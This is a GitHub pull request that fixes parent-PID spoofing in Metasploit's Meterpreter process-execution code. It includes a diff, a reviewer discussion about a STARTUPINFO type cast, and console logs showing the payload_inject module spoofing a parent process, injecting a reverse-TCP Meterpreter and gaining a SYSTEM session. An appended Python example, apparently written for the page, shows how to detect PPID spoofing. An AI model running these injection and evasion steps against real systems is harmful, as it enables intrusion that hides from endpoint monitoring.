
Fix PPID spoofing #660

Merged
merged 3 commits into from
Jun 20, 2023

Conversation

smashery
Contributor

This PR fixes rapid7/metasploit-framework#18113.

The commit be44377 introduced the issue by removing the structures required for PPID spoofing. I reverted that commit which fixed the issue. I added back in what I believe to be the intent of that commit: better memory management for the commandLine_w variable.


@smcintyre-r7 smcintyre-r7 left a comment


Tested the code and the changes look good. I just left the one comment.

@@ -382,11 +388,13 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
}
}

// Try to execute the process with duplicated token
if (!CreateProcessAsUserW(pToken, NULL, commandLine_w, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi))
if (!CreateProcessAsUserW(pToken, NULL, commandLine_w, NULL, NULL, inherit, createFlags, pEnvironment, NULL, (LPSTARTUPINFOW)&si, &pi))
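Review bot: the cast `(LPSTARTUPINFOW)&si` on the added line of this hunk hides a type mismatch instead of fixing it. `CreateProcessAsUserW` expects a `STARTUPINFOW` (or `STARTUPINFOEXW` when `EXTENDED_STARTUPINFO_PRESENT` is set) whose string members such as `lpDesktop` and `lpTitle` are UTF-16, and the A and W layouts differ only in that interpretation of those pointers, so when `si` is the ANSI `STARTUPINFOEXA`, as the review comment on this line states, any narrow string stored in it is read as wide. Declare `si` as `STARTUPINFOEXW`, set `si.StartupInfo.cb = sizeof(STARTUPINFOEXW)`, fill it with the W variants of the setup calls, and pass `&si.StartupInfo` (or `(LPSTARTUPINFOW)&si` of the correct W struct) without the cross-encoding cast.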
Contributor


The cast here of si to LPSTARTUPINFOW is concerning. Up to this point si was STARTUPINFOEXA using multi byte strings and not wide strings. Should si be completely switched to STARTUPINFOEXW? If that's the case, you could apply this patch I tested that will switch it to always using the W variant. https://github.com/smcintyre-r7/metasploit-payloads/commit/abd29ba1d709cb5aab08c55704614f38d5788c62.patch

Contributor Author


Yeah that is concerning. I've applied and tested that patch - looks good. Thanks.

Contributor

@smcintyre-r7 smcintyre-r7 left a comment


Changes look good to me. I tested them again with the new patch and everything checks out. I'll have this landed in a moment. Thanks for fixing this!

Before / Unpatched

msf6 exploit(windows/local/payload_inject) > show options 

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         7568             no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION      -1               yes       The session to run this module on
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/payload_inject) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/local/payload_inject) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running module against DC
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: The parameter is incorrect.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/payload_inject) > 

After / Patched

[*] Using exploit/windows/local/payload_inject
msf6 exploit(windows/local/payload_inject) > set PPID 3592
PPID => 3592
msf6 exploit(windows/local/payload_inject) > show options 

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         3592             no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION                       yes       The session to run this module on
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/payload_inject) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/payload_inject) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running module against DC
[*] Spawned Notepad process 1664
[*] Spoofing PPID 3592
[*] Injecting payload into 1664
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 1664
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:61873) at 2023-06-20 13:07:45 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/test/cmd_exec

[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should return the result of echo
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[*] Passed: 4; Failed: 0; Skipped: 0
meterpreter > run post/test/file

[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should test for directory existence
[+] should create directories
[+] should list the directory we just made
[+] should recursively delete the directory we just made
[+] should delete a symbolic link target
[+] should not recurse into symbolic link directories
[+] should test for file existence
[+] should create text files
[+] should read the text we just wrote
[+] should append text files
[+] should delete text files
[+] should move files
[+] should write binary data
[+] should read the binary data we just wrote
[+] should delete binary files
[+] should append binary data
[*] Passed: 16; Failed: 0; Skipped: 0
meterpreter > run post/test/meterpreter

[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0; Skipped: 0
meterpreter > 
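The patched run above shows the behaviour a defender has to account for: the Meterpreter host process spawns notepad (PID 1664) but the new process records 3592 as its parent, so the process tree no longer shows who created it. The following is an added example written for this page, not Metasploit code. It assumes process-start records shaped like the ETW Microsoft-Windows-Kernel-Process ProcessStart event, where the event header carries the PID of the process that issued the create call while the payload's ParentProcessID carries the parent the caller asked for; detection is then a comparison of the two. The child PID 1664 and spoofed parent 3592 are taken from the output above; the creator PID 5120, all image names and the other rows are constructed for illustration, and the allow-list of creators that legitimately set a foreign parent (the AppInfo service, hosted in svchost.exe, parents UAC-elevated processes to the requesting process) is a deliberate simplification that a real deployment would key on more than the image name.

```python
from dataclasses import dataclass
from typing import FrozenSet, Iterable, List


@dataclass(frozen=True)
class ProcessStart:
    """One process-start record. Constructed shape, modelled on the ETW
    Microsoft-Windows-Kernel-Process ProcessStart event (assumption)."""
    header_pid: int      # PID in the event header: the process that issued the create call
    header_image: str    # image name of that creator (joined in from its own start record)
    process_id: int      # PID of the new process
    parent_pid: int      # ParentProcessID from the event payload: what the process tree shows
    image: str           # image name of the new process


def is_spoofed(ev: ProcessStart) -> bool:
    """True when the parent recorded for the child is not the process that created it."""
    return ev.header_pid != ev.parent_pid


def find_spoofed(events: Iterable[ProcessStart],
                 allowed_creators: FrozenSet[str] = frozenset()) -> List[ProcessStart]:
    """Return events showing the spoofing pattern, skipping creators known to set a
    foreign parent legitimately (e.g. svchost.exe hosting AppInfo for UAC elevation).
    Matching on image name alone is a simplification for this example."""
    return [ev for ev in events
            if is_spoofed(ev) and ev.header_image.lower() not in allowed_creators]


# Constructed sample. 1664 and 3592 come from the PR's "After / Patched" output;
# 5120 (the Meterpreter host process), the image names and the remaining rows
# are invented. "payload-host.exe" is a placeholder image name.
SAMPLE_EVENTS = [
    # ordinary parent/child: explorer starts cmd, header PID and parent PID agree
    ProcessStart(2000, "explorer.exe", 2100, 2000, "cmd.exe"),
    # the PR scenario: the payload host (5120) spawns notepad but records 3592 as parent
    ProcessStart(5120, "payload-host.exe", 1664, 3592, "notepad.exe"),
    # UAC elevation: AppInfo in svchost.exe (900) creates the elevated process with the
    # requesting explorer.exe (2000) as its parent; same pattern, benign
    ProcessStart(900, "svchost.exe", 2200, 2000, "mmc.exe"),
]


def demo(allowed_creators: FrozenSet[str] = frozenset({"svchost.exe"})) -> List[ProcessStart]:
    """Run the check over the sample and print one line per hit; returns the hits."""
    hits = find_spoofed(SAMPLE_EVENTS, allowed_creators)
    for ev in hits:
        print(f"pid {ev.process_id} ({ev.image}) reports parent {ev.parent_pid} "
              f"but was created by {ev.header_pid} ({ev.header_image})")
    return hits


if __name__ == "__main__":
    demo()
```

Running the block prints only the notepad row; calling `find_spoofed(SAMPLE_EVENTS)` with an empty allow-list also returns the UAC row, which is the false positive the allow-list exists to suppress.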

@smcintyre-r7 smcintyre-r7 merged commit a15d95e into rapid7:master Jun 20, 2023
3 checks passed
zeroSteiner added a commit to zeroSteiner/metasploit-framework that referenced this pull request Jun 20, 2023
sempervictus pushed a commit to sempervictus/metasploit-framework that referenced this pull request Aug 1, 2023
JustAnda7 pushed a commit to JustAnda7/metasploit-framework that referenced this pull request Sep 20, 2023
Development

Successfully merging this pull request may close these issues.

Parent PID spoofing fails
2 participants